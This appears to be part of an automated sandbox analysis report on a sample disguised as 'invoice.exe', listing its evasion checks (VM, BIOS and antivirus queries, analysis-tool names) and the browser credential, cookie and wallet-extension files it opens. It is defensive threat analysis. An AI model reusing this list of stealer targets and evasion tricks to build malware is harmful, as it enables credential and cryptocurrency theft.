              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E6656 push eax; retf 007Ch0_3_007E6659
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC78C push ebx; ret 0_3_007DC791
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC78C push ebx; ret 0_3_007DC791
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC788 push ss; ret 0_3_007DC789
              Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\invoice.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\invoice.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: invoice.exeBinary or memory string: PROCMON.EXE
              Source: invoice.exeBinary or memory string: XENSERVICE.EXE
              Source: C:\Users\user\Desktop\invoice.exe TID: 7064Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\invoice.exe TID: 7064Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: invoice.exeBinary or memory string: MpVmp32EntryMetafile Recording ContextBi-Directional Text LayoutCursor Hotspot EditorOpenType Feature ActivatorPath Gradient GeneratorInk Recognition ProcessorDisplay Frequency SynchronizerMulti-Touch Gesture RecognizerAnti-Aliasing OptimizerTablet Pressure NormalizerDynamic Layout LocalizerDirectDraw Compatibility LayerFont Fallback Chain ResolverAccessibility Event RouterColor Space Converter16-bit Color Mode AdapterXPS Document RendererNon-Client Area RendererMultilingual Font MapperGDI Print Spooler HelperWindow Transparency ControllerText Antialiasing ControllerString Resource CompilerKeyboard Focus TrackerIcon Atlas PackerMouse Message ForwarderZ-Order Management Systemvmtoolsd.exeText Shaping EnginePixel Snapping Service0
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: invoice.exe, invoice.exe, 00000000.00000003.965445711.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.994878285.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000002.1002846121.0000000000799000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.916920006.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.973044989.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000002.1002987624.00000000007DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: invoice.exe, 00000000.00000003.934196029.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: invoice.exe, 00000000.00000002.1002704845.00000000003C4000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: *vmtoolsd.execuckoo_svc.exe
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\invoice.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: invoice.exe, 00000000.00000003.906344999.000000000283D000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000000.00000002.1002654387.0000000000369000.00000002.00000001.01000000.00000003.sdmp, invoice.exe, 00000000.00000000.883188851.0000000000369000.00000002.00000001.01000000.00000003.sdmp, invoice.exe, 00000000.00000002.1002704845.00000000003C4000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
              Source: invoice.exe, 00000000.00000002.1003104978.0000000000853000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.979948724.0000000000823000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.979895738.000000000084F000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000002.1003063314.0000000000826000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.979670115.0000000000826000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\invoice.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.invoice.exe.2760000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.invoice.exe.27c0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.invoice.exe.2760000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1003304693.0000000002760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
